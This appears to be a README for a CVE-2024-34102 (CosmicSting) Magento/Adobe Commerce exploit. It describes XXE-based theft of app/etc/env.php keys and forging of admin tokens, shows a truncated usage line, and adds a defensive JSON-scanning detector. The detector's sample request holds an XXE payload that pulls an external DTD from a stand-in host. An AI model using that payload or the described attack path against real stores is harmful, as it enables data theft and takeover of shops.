CosmicSting: critical unauthenticated XXE vulnerability in Adobe Commerce and Magento (CVE-2024-34102)

CVE-2024-34102 is a severe security flaw in Adobe Commerce and Magento caused by improper handling of nested deserialization. It lets attackers trigger XML External Entity (XXE) processing during deserialization, potentially allowing remote code execution. In short, attackers can craft malicious JSON payloads that, when deserialized by the application, instantiate objects with unintended properties or behaviors.

Exploiting this vulnerability allows attackers to gain unauthorized admin access to the REST API, GraphQL API, or SOAP API, potentially leading to data theft, service disruption, and complete compromise of affected systems.

The risk is significant because the flaw can be used to exfiltrate sensitive files such as app/etc/env.php, which contains cryptographic keys used for authentication. With those keys, attackers can forge administrator tokens and manipulate Magento's APIs as privileged users. Moreover, CVE-2024-34102 can be chained with other vulnerabilities, such as the PHP filter chains exploit (CVE-2024-2961), leading to remote code execution (RCE). More broadly, XXE vulnerabilities let attackers retrieve and manipulate data from external sources, which increases the potential impact on compromised systems.

Usage

```
usage: exploit.py [-h] --target…
```
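The description above says the attack arrives as a JSON payload whose nested values lead to XML external entity processing. A detection sketch for that shape follows, as an added example that is not from the original page or the exploit's author; the JSON key names, sample bodies and the `MAX_DEPTH` limit are assumptions made for illustration.

```python
import json
import re

# Markers of an inline DTD, and of one that declares an external entity.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
EXT_ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?:%\s*)?[\w.\-]+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE)
MAX_DEPTH = 32  # assumed limit: stop walking pathologically nested bodies


def find_xxe_strings(node, path="$", depth=0):
    """Yield (json_path, reason) for string values that carry a DTD."""
    if depth > MAX_DEPTH:
        yield path, "nesting deeper than MAX_DEPTH"
        return
    if isinstance(node, dict):
        for key, value in node.items():
            yield from find_xxe_strings(value, f"{path}.{key}", depth + 1)
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from find_xxe_strings(value, f"{path}[{i}]", depth + 1)
    elif isinstance(node, str):
        # External entity declarations are the high-confidence signal;
        # a bare DOCTYPE is reported separately as a weaker one.
        if EXT_ENTITY_RE.search(node):
            yield path, "external entity declaration"
        elif DOCTYPE_RE.search(node):
            yield path, "inline DOCTYPE"


def inspect_body(raw_body):
    """Return a list of findings for one API request body (str or bytes)."""
    try:
        doc = json.loads(raw_body)
    except (ValueError, RecursionError):
        return [("$", "body is not parseable JSON")]
    return list(find_xxe_strings(doc))


# Constructed sample bodies (not captured traffic; key names are made up).
BENIGN = '{"cart": {"items": [{"sku": "24-MB01", "qty": 1}]}}'
SUSPECT = json.dumps({"outer": {"inner": [{"data": (
    '<?xml version="1.0"?><!DOCTYPE r [<!ENTITY % ext SYSTEM '
    '"http://collector.example/x.dtd"> %ext;]><r/>')}]}})

if __name__ == "__main__":
    for name, body in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, inspect_body(body))
```

Because the walker runs on the decoded JSON, it sees the string after JSON escapes are resolved, so `\u003c`-style encoding of the angle brackets does not hide the DTD from the regexes.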